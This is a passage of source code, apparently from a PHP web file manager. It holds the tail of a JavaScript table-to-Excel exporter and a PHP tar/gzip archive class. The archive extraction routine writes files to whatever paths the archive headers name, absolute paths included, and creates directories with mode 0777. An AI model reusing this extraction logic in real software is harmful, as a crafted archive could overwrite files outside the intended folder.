			for (d = 2; c >= 2 << 5 * d;) ++d;
		for (h = 0; h < d; ++h) 1 == d ? e = c : (e = h ? 128 : 192, a = d - 2 - 6 * h, 0 <= a && (e += (6 <= a ? 1 : 0) + (5 <= a ? 2 : 0) + (4 <= a ? 4 : 0) + (3 <= a ? 8 : 0) + (2 <= a ? 16 : 0) + (1 <= a ? 32 : 0), a -= 5), 0 > a && (u = 6 * (d - 1 - h), e += c >> u, c -= c >> u << u)), f = b ? f << 6 - b : 0, b += 2, f += e >> b, g += k[f], f = e % (1 << b), 6 == b && (b = 0, g += k[f])
	}
	b && (g += k[f << 6 - b]);
	return g
}


var tableToExcelData = (function() {
    var uri = \'data:application/vnd.ms-excel;base64,\',
    template = \'<html xmlns:o=\"urn:schemas-microsoft-com:office:office\" xmlns:x=\"urn:schemas-microsoft-com:office:excel\" xmlns=\"http://www.w3.org/TR/REC-html40\"><head><!--[if gte mso 9]><xml><x:ExcelWorkbook><x:ExcelWorksheets><x:ExcelWorksheet><x:Name>{worksheet}</x:Name><x:WorksheetOptions><x:DisplayGridlines></x:DisplayGridlines></x:WorksheetOptions></x:ExcelWorksheet></x:ExcelWorksheets></x:ExcelWorkbook></xml><![endif]--><meta http-equiv=\"content-type\" content=\"text/plain; charset=UTF-8\"/></head><body><table>{table}</table></body></html>\',
    format = function(s, c) {
            return s.replace(/{(\\w+)}/g, function(m, p) {
                return c[p];
            })
        }
    return function(table, name) {
        if (!table.nodeType) table = document.getElementById(table)
        var ctx = {
            worksheet: name || \'Worksheet\',
            table: table.innerHTML.replace(/<span(.*?)\\/span> /g,\"\").replace(/<a\\b[^>]*>(.*?)<\\/a>/g,\"$1\")
        }
		t = new Date();
		filename = \'fm_\' + t.toISOString() + \'.xls\'
		download_xls(filename, base64_encode(format(template, ctx)))
    }
})();

var table2Excel = function () {

    var ua = window.navigator.userAgent;
    var msie = ua.indexOf(\"MSIE \");

	this.CreateExcelSheet = 
		function(el, name){
			if (msie > 0 || !!navigator.userAgent.match(/Trident.*rv\\:11\\./)) {// If Internet Explorer

				var x = document.getElementById(el).rows;

				var xls = new ActiveXObject(\"Excel.Application\");

				xls.visible = true;
				xls.Workbooks.Add
				for (i = 0; i < x.length; i++) {
					var y = x[i].cells;

					for (j = 0; j < y.length; j++) {
						xls.Cells(i + 1, j + 1).Value = y[j].innerText;
					}
				}
				xls.Visible = true;
				xls.UserControl = true;
				return xls;
			} else {
				tableToExcelData(el, name);
			}
		}
}
</script>
</body>
</html>

<?php
//Ported from ReloadCMS project http://reloadcms.com
class archiveTar {
	var $archive_name = \'\';
	var $tmp_file = 0;
	var $file_pos = 0;
	var $isGzipped = true;
	var $errors = array();
	var $files = array();
	
	function __construct(){
		if (!isset($this->errors)) $this->errors = array();
	}
	
	function createArchive($file_list){
		$result = false;
		if (file_exists($this->archive_name) && is_file($this->archive_name)) 	$newArchive = false;
		else $newArchive = true;
		if ($newArchive){
			if (!$this->openWrite()) return false;
		} else {
			if (filesize($this->archive_name) == 0)	return $this->openWrite();
			if ($this->isGzipped) {
				$this->closeTmpFile();
				if (!rename($this->archive_name, $this->archive_name.\'.tmp\')){
					$this->errors[] = __(\'Cannot rename\').\' \'.$this->archive_name.__(\' to \').$this->archive_name.\'.tmp\';
					return false;
				}
				$tmpArchive = gzopen($this->archive_name.\'.tmp\', \'rb\');
				if (!$tmpArchive){
					$this->errors[] = $this->archive_name.\'.tmp \'.__(\'is not readable\');
					rename($this->archive_name.\'.tmp\', $this->archive_name);
					return false;
				}
				if (!$this->openWrite()){
					rename($this->archive_name.\'.tmp\', $this->archive_name);
					return false;
				}
				$buffer = gzread($tmpArchive, 512);
				if (!gzeof($tmpArchive)){
					do {
						$binaryData = pack(\'a512\', $buffer);
						$this->writeBlock($binaryData);
						$buffer = gzread($tmpArchive, 512);
					}
					while (!gzeof($tmpArchive));
				}
				gzclose($tmpArchive);
				unlink($this->archive_name.\'.tmp\');
			} else {
				$this->tmp_file = fopen($this->archive_name, \'r+b\');
				if (!$this->tmp_file)	return false;
			}
		}
		if (isset($file_list) && is_array($file_list)) {
		if (count($file_list)>0)
			$result = $this->packFileArray($file_list);
		} else $this->errors[] = __(\'No file\').__(\' to \').__(\'Archive\');
		if (($result)&&(is_resource($this->tmp_file))){
			$binaryData = pack(\'a512\', \'\');
			$this->writeBlock($binaryData);
		}
		$this->closeTmpFile();
		if ($newArchive && !$result){
		$this->closeTmpFile();
		unlink($this->archive_name);
		}
		return $result;
	}

	function restoreArchive($path){
		$fileName = $this->archive_name;
		if (!$this->isGzipped){
			if (file_exists($fileName)){
				if ($fp = fopen($fileName, \'rb\')){
					$data = fread($fp, 2);
					fclose($fp);
					if ($data == \'\\37\\213\'){
						$this->isGzipped = true;
					}
				}
			}
			elseif ((substr($fileName, -2) == \'gz\') OR (substr($fileName, -3) == \'tgz\')) $this->isGzipped = true;
		} 
		$result = true;
		if ($this->isGzipped) $this->tmp_file = gzopen($fileName, \'rb\');
		else $this->tmp_file = fopen($fileName, \'rb\');
		if (!$this->tmp_file){
			$this->errors[] = $fileName.\' \'.__(\'is not readable\');
			return false;
		}
		$result = $this->unpackFileArray($path);
			$this->closeTmpFile();
		return $result;
	}

	function showErrors	($message = \'\') {
		$Errors = $this->errors;
		if(count($Errors)>0) {
		if (!empty($message)) $message = \' (\'.$message.\')\';
			$message = __(\'Error occurred\').$message.\': <br/>\';
			foreach ($Errors as $value)
				$message .= $value.\'<br/>\';
			return $message;	
		} else return \'\';
		
	}
	
	function packFileArray($file_array){
		$result = true;
		if (!$this->tmp_file){
			$this->errors[] = __(\'Invalid file descriptor\');
			return false;
		}
		if (!is_array($file_array) || count($file_array)<=0)
          return true;
		for ($i = 0; $i<count($file_array); $i++){
			$filename = $file_array[$i];
			if ($filename == $this->archive_name)
				continue;
			if (strlen($filename)<=0)
				continue;
			if (!file_exists($filename)){
				$this->errors[] = __(\'No file\').\' \'.$filename;
				continue;
			}
			if (!$this->tmp_file){
			$this->errors[] = __(\'Invalid file descriptor\');
			return false;
			}
		if (strlen($filename)<=0){
			$this->errors[] = __(\'Filename\').\' \'.__(\'is incorrect\');;
			return false;
		}
		$filename = str_replace(\'\\\\\', \'/\', $filename);
		$keep_filename = $this->makeGoodPath($filename);
		if (is_file($filename)){
			if (($file = fopen($filename, \'rb\')) == 0){
				$this->errors[] = __(\'Mode \').__(\'is incorrect\');
			}
				if(($this->file_pos == 0)){
					if(!$this->writeHeader($filename, $keep_filename))
						return false;
				}
				while (($buffer = fread($file, 512)) != \'\'){
					$binaryData = pack(\'a512\', $buffer);
					$this->writeBlock($binaryData);
				}
			fclose($file);
		}	else $this->writeHeader($filename, $keep_filename);
			if (@is_dir($filename)){
				if (!($handle = opendir($filename))){
					$this->errors[] = __(\'Error\').\': \'.__(\'Directory \').$filename.__(\'is not readable\');
					continue;
				}
				while (false !== ($dir = readdir($handle))){
					if ($dir!=\'.\' && $dir!=\'..\'){
						$file_array_tmp = array();
						if ($filename != \'.\')
							$file_array_tmp[] = $filename.\'/\'.$dir;
						else
							$file_array_tmp[] = $dir;

						$result = $this->packFileArray($file_array_tmp);
					}
				}
				unset($file_array_tmp);
				unset($dir);
				unset($handle);
			}
		}
		return $result;
	}

	function unpackFileArray($path){ 
		$path = str_replace(\'\\\\\', \'/\', $path);
		if ($path == \'\'	|| (substr($path, 0, 1) != \'/\' && substr($path, 0, 3) != \'../\' && !strpos($path, \':\')))	$path = \'./\'.$path;
		clearstatcache();
		while (strlen($binaryData = $this->readBlock()) != 0){
			if (!$this->readHeader($binaryData, $header)) return false;
			if ($header[\'filename\'] == \'\') continue;
			if ($header[\'typeflag\'] == \'L\'){			//reading long header
				$filename = \'\';
				$decr = floor($header[\'size\']/512);
				for ($i = 0; $i < $decr; $i++){
					$content = $this->readBlock();
					$filename .= $content;
				}
				if (($laspiece = $header[\'size\'] % 512) != 0){
					$content = $this->readBlock();
					$filename .= substr($content, 0, $laspiece);
				}
				$binaryData = $this->readBlock();
				if (!$this->readHeader($binaryData, $header)) return false;
				else $header[\'filename\'] = $filename;
				return true;
			}
			if (($path != \'./\') && ($path != \'/\')){
				while (substr($path, -1) == \'/\') $path = substr($path, 0, strlen($path)-1);
				if (substr($header[\'filename\'], 0, 1) == \'/\') $header[\'filename\'] = $path.$header[\'filename\'];
				else $header[\'filename\'] = $path.\'/\'.$header[\'filename\'];
			}
			
			if (file_exists($header[\'filename\'])){
				if ((@is_dir($header[\'filename\'])) && ($header[\'typeflag\'] == \'\')){
					$this->errors[] =__(\'File \').$header[\'filename\'].__(\' already exists\').__(\' as folder\');
					return false;
				}
				if ((is_file($header[\'filename\'])) && ($header[\'typeflag\'] == \'5\')){
					$this->errors[] =__(\'Cannot create directory\').\'. \'.__(\'File \').$header[\'filename\'].__(\' already exists\');
					return false;
				}
				if (!is_writeable($header[\'filename\'])){
					$this->errors[] = __(\'Cannot write to file\').\'. \'.__(\'File \').$header[\'filename\'].__(\' already exists\');
					return false;
				}
			} elseif (($this->dirCheck(($header[\'typeflag\'] == \'5\' ? $header[\'filename\'] : dirname($header[\'filename\'])))) != 1){
				$this->errors[] = __(\'Cannot create directory\').\' \'.__(\' for \').$header[\'filename\'];
				return false;
			}

			if ($header[\'typeflag\'] == \'5\'){
				if (!file_exists($header[\'filename\']))		{
					if (!mkdir($header[\'filename\'], 0777))	{
						
						$this->errors[] = __(\'Cannot create directory\').\' \'.$header[\'filename\'];
						return false;
					} 
				}
			} else {
				if (($destination = fopen($header[\'filename\'], \'wb\')) == 0) {
					$this->errors[] = __(\'Cannot write to file\').\' \'.$header[\'filename\'];
					return false;
				} else {
					$decr = floor($header[\'size\']/512);
					for ($i = 0; $i < $decr; $i++) {
						$content = $this->readBlock();
						fwrite($destination, $content, 512);
					}
					if (($header[\'size\'] % 512) != 0) {
						$content = $this->readBlock();
						fwrite($destination, $content, ($header[\'size\'] % 512));
					}
					fclose($destination);
					touch($header[\'filename\'], $header[\'time\']);
				}
				clearstatcache();
				if (filesize($header[\'filename\']) != $header[\'size\']) {
					$this->errors[] = __(\'Size of file\').\' \'.$header[\'filename\'].\' \'.__(\'is incorrect\');
					return false;
				}
			}
			if (($file_dir = dirname($header[\'filename\'])) == $header[\'filename\']) $file_dir = \'\';
			if ((substr($header[\'filename\'], 0, 1) == \'/\') && ($file_dir == \'\')) $file_dir = \'/\';
			$this->dirs[] = $file_dir;
			$this->files[] = $header[\'filename\'];
	
		}
		return true;
	}

	function dirCheck($dir){
		$parent_dir = dirname($dir);

		if ((@is_dir($dir)) or ($dir == \'\'))
			return true;

		if (($parent_dir != $dir) and ($parent_dir != \'\') and (!$this->dirCheck($parent_dir)))
			return false;

		if (!mkdir($dir, 0777)){
			$this->errors[] = __(\'Cannot create directory\').\' \'.$dir;
			return false;
		}
		return true;
	}

	function readHeader($binaryData, &$header){
		if (strlen($binaryData)==0){
			$header[\'filename\'] = \'\';
			return true;
		}

		if (strlen($binaryData) != 512){
			$header[\'filename\'] = \'\';
			$this->__(\'Invalid block size\').\': \'.strlen($binaryData);
			return false;
		}

		$checksum = 0;
		for ($i = 0; $i < 148; $i++) $checksum+=ord(substr($binaryData, $i, 1));
		for ($i = 148; $i < 156; $i++) $checksum += ord(\' \');
		for ($i = 156; $i < 512; $i++) $checksum+=ord(substr($binaryData, $i, 1));

		$unpack_data = unpack(\'a100filename/a8mode/a8user_id/a8group_id/a12size/a12time/a8checksum/a1typeflag/a100link/a6magic/a2version/a32uname/a32gname/a8devmajor/a8devminor\', $binaryData);

		$header[\'checksum\'] = OctDec(trim($unpack_data[\'checksum\']));
		if ($header[\'checksum\'] != $checksum){
			$header[\'filename\'] = \'\';
			if (($checksum == 256) && ($header[\'checksum\'] == 0)) 	return true;
			$this->errors[] = __(\'Error checksum for file \').$unpack_data[\'filename\'];
			return false;
		}

		if (($header[\'typeflag\'] = $unpack_data[\'typeflag\']) == \'5\')	$header[\'size\'] = 0;
		$header[\'filename\'] = trim($unpack_data[\'filename\']);
		$header[\'mode\'] = OctDec(trim($unpack_data[\'mode\']));
		$header[\'user_id\'] = OctDec(trim($unpack_data[\'user_id\']));
		$header[\'group_id\'] = OctDec(trim($unpack_data[\'group_id\']));
		$header[\'size\'] = OctDec(trim($unpack_data[\'size\']));
		$header[\'time\'] = OctDec(trim($unpack_data[\'time\']));
		return true;
	}

	function writeHeader($filename, $keep_filename){
		$packF = \'a100a8a8a8a12A12\';
		$packL = \'a1a100a6a2a32a32a8a8a155a12\';
		if (strlen($keep_filename)<=0) $keep_filename = $filename;
		$filename_ready = $this->makeGoodPath($keep_filename);

		if (strlen($filename_ready) > 99){							//write long header
		$dataFirst = pack($packF, \'././LongLink\', 0, 0, 0, sprintf(\'%11s \', DecOct(strlen($filename_ready))), 0);
		$dataLast = pack($packL, \'L\', \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\');

        //  Calculate the checksum
		$checksum = 0;
        //  First part of the header
		for ($i = 0; $i < 148; $i++)
			$checksum += ord(substr($dataFirst, $i, 1));
        //  Ignore the checksum value and replace it by \' \' (space)
		for ($i = 148; $i < 156; $i++)
			$checksum += ord(\' \');
        //  Last part of the header
		for ($i = 156, $j=0; $i < 512; $i++, $j++)
			$checksum += ord(substr($dataLast, $j, 1));
        //  Write the first 148 bytes of the header in the archive
		$this->writeBlock($dataFirst, 148);
        //  Write the calculated checksum
		$checksum = sprintf(\'%6s \', DecOct($checksum));
		$binaryData = pack(\'a8\', $checksum);
		$this->writeBlock($binaryData, 8);
        //  Write the last 356 bytes of the header in the archive
		$this->writeBlock($dataLast, 356);

		$tmp_filename = $this->makeGoodPath($filename_ready);

		$i = 0;
			while (($buffer = substr($tmp_filename, (($i++)*512), 512)) != \'\'){
				$binaryData = pack(\'a512\', $buffer);
				$this->writeBlock($binaryData);
			}
		return true;
		}
		$file_info = stat($filename);
		if (@is_dir($filename)){
			$typeflag = \'5\';
			$size = sprintf(\'%11s \', DecOct(0));
		} else {
			$typeflag = \'\';
			clearstatcache();
			$size = sprintf(\'%11s \', DecOct(filesize($filename)));
		}
		$dataFirst = pack($packF, $filename_ready, sprintf(\'%6s \', DecOct(fileperms($filename))), sprintf(\'%6s \', DecOct($file_info[4])), sprintf(\'%6s \', DecOct($file_info[5])), $size, sprintf(\'%11s\', DecOct(filemtime($filename))));
		$dataLast = pack($packL, $typeflag, \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\');
		$checksum = 0;
		for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1));
		for ($i = 148; $i < 156; $i++) $checksum += ord(\' \');
		for ($i = 156, $j = 0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1));
		$this->writeBlock($dataFirst, 148);
		$checksum = sprintf(\'%6s \', DecOct($checksum));
		$binaryData = pack(\'a8\', $checksum);
		$this->writeBlock($binaryData, 8);
		$this->writeBlock($dataLast, 356);
		return true;
	}

	function openWrite(){
		if ($this->isGzipped)
			$this->tmp_file = gzopen($this->archive_name, \'wb9f\');
		else
			$this->tmp_file = fopen($this->archive_name, \'wb\');

		if (!($this->tmp_file)){
			$this->errors[] = __(\'Cannot write to file\').\' \'.$this->archive_name;
			return false;
		}
		return true;
	}

	function readBlock(){
		if (is_resource($this->tmp_file)){
			if ($this->isGzipped)
				$block = gzread($this->tmp_file, 512);
			else
				$block = fread($this->tmp_file, 512);
		} else	$block = \'\';

		return $block;
	}

	function writeBlock($data, $length = 0){
		if (is_resource($this->tmp_file)){
		
			if ($length === 0){
				if ($this->isGzipped)
					gzputs($this->tmp_file, $data);
				else
					fputs($this->tmp_file, $data);
			} else {
				if ($this->isGzipped)
					gzputs($this->tmp_file, $data, $length);
				else
					fputs($this->tmp_file, $data, $length);
			}
		}
	}

	function closeTmpFile(){
		if (is_resource($this->tmp_file)){
			if ($this->isGzipped)
				gzclose($this->tmp_file);
			else
				fclose($this->tmp_file);

			$this->tmp_file = 0;
		}
	}

	function makeGoodPath($path){
		if (strlen($path)>0){
			$path = str_replace(\'\\\\\', \'/\', $path);
			$partPath = explode(\'/\', $path);
			$els = count($partPath)-1;
			for ($i = $els; $i>=0; $i--){
				if ($partPath[$i] == \'.\'){
                    //  Ignore this directory
                } elseif ($partPath[$i] == \'..\'){
                    $i--;
                }
				elseif (($partPath[$i] == \'\') and ($i!=$els) and ($i!=0)){
                }	else
					$result = $partPath[$i].($i!=$els ? \'/\'.$result : \'\');
			}
		} else $result = \'\';
		
		return $result;
	}
}
?>